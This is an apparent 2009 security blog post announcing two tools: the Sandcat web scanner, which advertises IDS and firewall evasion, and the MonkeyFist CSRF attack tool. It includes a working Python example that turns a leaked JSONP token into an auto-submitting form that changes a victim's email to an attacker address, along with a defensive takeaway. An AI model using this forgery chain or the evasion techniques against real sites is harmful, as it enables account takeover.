Tuesday, August 18, 2009

SandCat v3.8 Released

Sandcat allows web administrators to perform aggressive and comprehensive scans of an organization's web server to isolate vulnerabilities and identify security holes. The Sandcat scanner requires basic inputs such as host names, start URLs and port numbers to scan a complete web site and test all of its web applications for security vulnerabilities.

New features in version 3.8
Improved JavaScript/AJAX Support - Sandcat's JavaScript emulator makes Sandcat behave as both Firefox and IE, simulating user interaction (such as key presses and mouse clicks), AJAX calls and more. This feature complements the JavaScript analysis feature available since Sandcat 3.0.

Multi-Layer Defense Evasion - Sandcat 3.8 attempts to detect and evade intrusion detection systems, web application firewalls, web honeypots and anti-XSS filters.

Multi-Thread Sessions (Pro version only) - Sandcat Session Launcher adds concurrent sessions support in Sandcat. Multiple host threads per session are also supported.

And more - A new, improved HTML parser, improved link detection, faster and more robust report generation, and many other enhancements greatly expand Sandcat's capabilities and make your life as a penetration tester a lot easier.

Download Free Release

Monday, August 10, 2009

MonkeyFist v0.4 Released

Hexagon Security Group releases MonkeyFist, a dynamic Request Forgery attack tool. (http://hexsec.com/)


MonkeyFist is a tool that creates dynamic request forgeries based on cross-domain data leakage. The tool constructs a payload based on data in the payloads.xml file and sends it to the user's browser. Because the payload can incorporate session data that leaked across domains, it can bypass Cross-Site Request Forgery protection mechanisms that rely on that data staying secret.
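To make the mechanism concrete, here is an added example (written for this post, not MonkeyFist's own code) of a dynamic request forgery: a target site leaks its anti-CSRF token and user id through a JSONP endpoint that any origin can load with a script tag, the attacker extracts those values, fills them into a request template, and renders an auto-submitting form for the victim's browser. The JSONP response is constructed, and the XML template is a hypothetical stand-in in the spirit of payloads.xml, not MonkeyFist's actual schema (the standard-library XML parser is used instead of lxml so the example runs without extra dependencies):

```python
"""
Dynamic CSRF illustration: forge a request from data that leaked cross-domain.
Everything here is constructed for the example; the XML template is a
hypothetical stand-in for a payloads.xml entry, not MonkeyFist's real schema.
"""
import html
import json
import re
import xml.etree.ElementTree as ET

# Constructed: what a target site might return from a JSONP endpoint that an
# attacker-controlled page can load via <script src=...>. The anti-CSRF token
# is therefore readable cross-domain, which defeats its purpose.
LEAKED_JSONP = ('profileCallback({"user": "alice", "csrf_token": "9f2c1e0b7a5d", '
                '"email": "alice@example.test"});')

# Constructed, hypothetical payload template. ${name} placeholders are filled
# from the leaked data at runtime; the action URL and attacker email are made up.
PAYLOAD_XML = """
<payload name="change-email" method="POST" action="https://target.example.test/account/email">
  <param name="csrf_token" value="${csrf_token}"/>
  <param name="user" value="${user}"/>
  <param name="new_email" value="attacker@evil.test"/>
</payload>
"""

_JSONP_RE = re.compile(r"^\s*[\w$.]+\((.*)\)\s*;?\s*$", re.S)
_PLACEHOLDER_RE = re.compile(r"\$\{(\w+)\}")


def extract_leaked_data(jsonp_text):
    """Strip the JSONP callback wrapper and parse the JSON object inside.

    Raises ValueError for plain JSON: without the callback wrapper a script tag
    cannot read the body, so nothing leaks and the forgery cannot be built.
    """
    m = _JSONP_RE.match(jsonp_text)
    if not m:
        raise ValueError("response is not a JSONP callback; no cross-domain leak")
    data = json.loads(m.group(1))
    if not isinstance(data, dict):
        raise ValueError("JSONP body is not a JSON object")
    return data


def fill(template, leaked):
    """Replace every ${name} with leaked[name]; fail if a needed value never leaked."""
    def sub(m):
        key = m.group(1)
        if key not in leaked:
            raise KeyError(f"required value {key!r} did not leak; forgery not possible")
        return str(leaked[key])
    return _PLACEHOLDER_RE.sub(sub, template)


def build_forged_request(payload_xml, leaked):
    """Return (method, action, params) with placeholders filled from leaked data."""
    root = ET.fromstring(payload_xml)
    method = root.get("method", "GET").upper()
    action = fill(root.get("action"), leaked)
    params = {p.get("name"): fill(p.get("value", ""), leaked)
              for p in root.findall("param")}
    return method, action, params


def render_autosubmit_form(method, action, params):
    """Render the HTML the victim's browser would load: a self-submitting form."""
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in params.items())
    return (f'<form id="f" method="{method}" action="{html.escape(action, quote=True)}">'
            f'{inputs}</form><script>document.getElementById("f").submit();</script>')


def forge(jsonp_text=LEAKED_JSONP, payload_xml=PAYLOAD_XML):
    """Full chain: leaked response -> filled template -> auto-submitting page."""
    leaked = extract_leaked_data(jsonp_text)
    method, action, params = build_forged_request(payload_xml, leaked)
    return method, action, params, render_autosubmit_form(method, action, params)


if __name__ == "__main__":
    method, action, params, page = forge()
    print(method, action)
    print(params)
    print(page)
```

The defensive takeaway is the failure path: if the same profile data is served as plain JSON with no callback wrapper (and no permissive CORS header), `extract_leaked_data` raises and the template's `${csrf_token}` can never be filled, so a per-session token keeps its value. The token is only as secret as the least careful endpoint that echoes it.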

Written in

It is written in Python, which means it is cross-platform, and many operating systems already come with Python installed. The only dependency as of now is lxml, which is currently used only for the fixation payload type.

Read the Dynamic CSRF paper here


More Information

For usage or practical examples, check out the Neohaxor blog.

Best Regards.


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.